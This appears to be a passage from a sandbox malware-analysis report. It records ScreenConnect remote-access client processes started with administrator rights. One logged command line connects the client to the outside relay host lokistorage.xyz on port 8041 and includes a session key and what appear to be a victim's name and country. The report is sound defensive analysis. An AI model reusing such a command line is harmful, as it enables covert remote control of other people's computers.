Imagebase:	0x120000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	12:40:23
Start date:	12/11/2024
Path:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=3a500b51-1436-4bf3-8200-68822bcae42d&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Patrycja%20Bochenek&c=PL&c=Dariusz&c=&c=&c=&c=&c=&c="
Imagebase:	0x880000
File size:	95'520 bytes
MD5 hash:	826314610D9E854477B08666330940B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	false

Target ID:	9
Start time:	12:40:25
Start date:	12/11/2024
Path:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "9bc287e7-1c02-4a4b-bd79-9db7a3015930" "User"
Imagebase:	0x790000
File size:	598'816 bytes
MD5 hash:	AB5FA8D90645878D587F386D0E276C02
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.2730222529.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.1546068019.0000000000792000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	false

Target ID:	10
Start time:	12:40:27
Start date:	12/11/2024
Path:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "59802056-0e86-4f92-b003-56a2c2f706f5" "System"
Imagebase:	0x9d0000
File size:	598'816 bytes
MD5 hash:	AB5FA8D90645878D587F386D0E276C02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1598063638.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true